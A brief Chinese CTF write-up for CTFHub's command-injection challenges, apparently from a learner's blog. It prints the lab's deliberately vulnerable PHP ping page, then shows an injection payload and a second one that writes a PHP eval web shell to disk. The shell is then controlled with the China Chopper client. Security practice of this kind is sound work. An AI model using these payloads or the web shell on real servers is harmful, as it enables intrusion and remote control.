CTFHub web技能樹之RCE初步 命令注入+過濾cat

在一個大佬的突然丟了個題過來，於是去玩了玩rce的兩道題

 大佬的博客跳轉鏈接在此-》》》大佬召喚機

叫

命令注入

 

 

 

一上來就是源碼出現，上面有個ping的地方

 

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $cmd = "ping -c 4 {$_GET['ip']}";
    exec($cmd, $res);
}

?>

<!DOCTYPE html>
<html>
<head>
    <title>CTFHub 命令注入-無過濾</title>
</head>
<body>

<h1>CTFHub 命令注入-無過濾</h1>

<form action="#" method="GET">
    <label for="ip">IP : </label><br>
    <input type="text" id="ip" name="ip">
    <input type="submit" value="Ping">
</form>

<hr>

<pre>
<?php
if ($res) {
    print_r($res);
}
?>
</pre>

<?php
show_source(__FILE__);
?>

</body>
</html>

 

先ping 本地

 

然后好像沒啥

 

 

然后試試管道命令

 

127.0.0.1 | ls

 

 

然后試着去嘗試cat，發現貌似被屏蔽了

 

慘兮兮

 

然后大佬悠悠的說了一句，一句話，擼到底

 

127.0.0.1 & echo "<?php @eval(@@\$_POST['a']);?>" > 3.php

　　

 

記得轉譯后面的 $（把兩個at at去掉（post

之前的））

 

然后一把菜刀直接丟過去，大佬給的Java版本的菜刀真好用

 

 

 

 

過濾cat那道題也是一樣的方式可以